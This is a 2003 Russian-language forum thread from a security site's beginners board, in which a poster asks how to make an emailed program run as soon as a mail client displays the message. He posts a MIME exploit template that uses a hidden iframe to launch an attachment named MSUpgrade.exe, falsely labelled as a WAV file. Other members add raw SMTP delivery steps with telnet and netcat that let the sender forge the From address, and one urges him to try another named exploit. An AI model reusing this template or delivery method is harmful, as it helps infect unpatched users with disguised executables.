информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100 		За кого нас держат?Где водятся OGRыВсе любят мед
BugTraq.Ru
 Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Очередное исследование 19 миллиардов... 
 Оптимизация ввода-вывода как инструмент... 
 Зловреды выбирают Lisp и Delphi 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / beginners
Имя Пароль
если вы видите этот текст, отключите в настройках форума использование JavaScript
ФОРУМ
все доски
FAQ
IRC
новые сообщения
site updates
guestbook
beginners
sysadmin
programming
operating systems
theory
web building
software
hardware
networking
law
hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
Господа, будьте снисходительны, не бросайтесь сразу штрафовать за, как вам кажется, глупые вопросы - beginners на то и beginners.
The bat-ом 01.09.03 13:28  Число просмотров: 1201
Автор: v15 Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> > Как переслать мыло, чтобы не менялась служебная часть.
> > Слышал о прог-ге под названием Zender. Может кто-то
> > подскажет по этому поводу!
> Скажи точнее что тебе надо. Тебе одно письмо или
> автоматизированно, на SMTP серваке или уже после получения
> и т.д.
Надо, чтобы при доставке почты клиентом (без открытия) запускалась вложенная в тело письма прог-а. Например:
From: <vr_conv@rambler.ru>
To: <vr_con@rambler.ru>
Subject: !!!!!Test
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="


--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="MSUpgrade.exe"
Content-Transfer-Encoding: base64

Здесь, собственно, тело письма - бинарник прог-и которая должна стартовать.

--Служебная концовка
<beginners>
Пересылка мыла без изменения служебной части (чем?) 31.08.03 18:48  
Автор: v15 Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Как переслать мыло, чтобы не менялась служебная часть. Слышал о прог-ге под названием Zender. Может кто-то подскажет по этому поводу!
The bat-ом 01.09.03 10:16  
Автор: amirul <Serge> Статус: The Elderman
<"чистая" ссылка>
> Как переслать мыло, чтобы не менялась служебная часть.
> Слышал о прог-ге под названием Zender. Может кто-то
> подскажет по этому поводу!
Скажи точнее что тебе надо. Тебе одно письмо или автоматизированно, на SMTP серваке или уже после получения и т.д.
The bat-ом 01.09.03 13:28  
Автор: v15 Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> > Как переслать мыло, чтобы не менялась служебная часть.
> > Слышал о прог-ге под названием Zender. Может кто-то
> > подскажет по этому поводу!
> Скажи точнее что тебе надо. Тебе одно письмо или
> автоматизированно, на SMTP серваке или уже после получения
> и т.д.
Надо, чтобы при доставке почты клиентом (без открытия) запускалась вложенная в тело письма прог-а. Например:
From: <vr_conv@rambler.ru>
To: <vr_con@rambler.ru>
Subject: !!!!!Test
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="


--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="MSUpgrade.exe"
Content-Transfer-Encoding: base64

Здесь, собственно, тело письма - бинарник прог-и которая должна стартовать.

--Служебная концовка
telnet-ом 01.09.03 13:38  
Автор: whiletrue <Роман> Статус: Elderman
Отредактировано 01.09.03 13:52  Количество правок: 1
<"чистая" ссылка>
> > > Как переслать мыло, чтобы не менялась служебная
> часть.
> > > Слышал о прог-ге под названием Zender. Может
> кто-то
> > > подскажет по этому поводу!
> > Скажи точнее что тебе надо. Тебе одно письмо или
> > автоматизированно, на SMTP серваке или уже после
> получения
> > и т.д.

запускаешь telnet

open <адрес сервака куда шлешь> 25

HELO <имя>
MAIL From: <me@me.com>
RCPT To: <мыло на которое шлешь>
DATA
<мессага>
.
QUIT

где:
<адрес сервака куда шлешь> - определяется следующим образом:
nslookup -type=MX <часть мыла после собаки>

<мессага> - это твоя мессага...

> Надо, чтобы при доставке почты клиентом (без открытия)
> запускалась вложенная в тело письма прог-а.

Эти дырки позакрывали уже давно. В пятом OE прокатит...
Это невозможно вообще??? 02.09.03 17:55  
Автор: v15 Статус: Незарегистрированный пользователь
<"чистая" ссылка>

>
> Эти дырки позакрывали уже давно. В пятом OE прокатит...

Я не понял. Это невозможно в принципе?
Если речь об автоматическом запуске бинарника при показе письма, то 02.09.03 18:09  
Автор: Ktirf <Æ Rusakov> Статус: Elderman
<"чистая" ссылка>
> > Эти дырки позакрывали уже давно. В пятом OE
> прокатит...
>
> Я не понял. Это невозможно в принципе?
Эти дырки если не все, то очень многие, действительно позакрывали. Единственный шанс - нарваться на непропатченного почтового клиента. Но поскольку времени с тех пор, как за запусками непрошеного кода стали следить, прошло уже довольно много, то и это шанс невеликий.
Если речь об автоматическом запуске бинарника при показе письма, то 03.09.03 11:05  
Автор: v15 Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> > > Эти дырки позакрывали уже давно. В пятом OE
> > прокатит...
> >
> > Я не понял. Это невозможно в принципе?
> Эти дырки если не все, то очень многие, действительно
> позакрывали. Единственный шанс - нарваться на
> непропатченного почтового клиента. Но поскольку времени с
> тех пор, как за запусками непрошеного кода стали следить,
> прошло уже довольно много, то и это шанс невеликий.

А что ты думаешь про експлойт 2DimensionOfExploitsEnc?
Может с этой стороны?
Попробуй! Сообщи о результатах 03.09.03 11:27  
Автор: whiletrue <Роман> Статус: Elderman
<"чистая" ссылка>
> А что ты думаешь про експлойт 2DimensionOfExploitsEnc?
> Может с этой стороны?

Прикольная уязвимость! Только она, кажись, не прокатит, если чел за прокси сидит.
Мне больше netcat нравится 01.09.03 15:26  
Автор: amirul <Serge> Статус: The Elderman
<"чистая" ссылка>

> open <адрес сервака куда шлешь> 25

Просто там не надо все это руками набивать.
> HELO <имя>
> MAIL From: <me@me.com>
> RCPT To: <мыло на которое шлешь>
> DATA
> <мессага>
> .
> QUIT
Надо засунуть все это в файл, например mail.txt и сделать

nc <mail.txt server_address.domain 25

> где:
> <адрес сервака куда шлешь> - определяется следующим
> образом:
> nslookup -type=MX <часть мыла после собаки>
>
> <мессага> - это твоя мессага...
>
> > Надо, чтобы при доставке почты клиентом (без открытия)
> > запускалась вложенная в тело письма прог-а.
>
> Эти дырки позакрывали уже давно. В пятом OE прокатит...
Telnet'ом и nc'ом 01.09.03 18:07  
Автор: v15 Статус: Незарегистрированный пользователь
<"чистая" ссылка>
>
> > open <адрес сервака куда шлешь> 25
>
Спасибо, сейчас попробую.
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2025 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach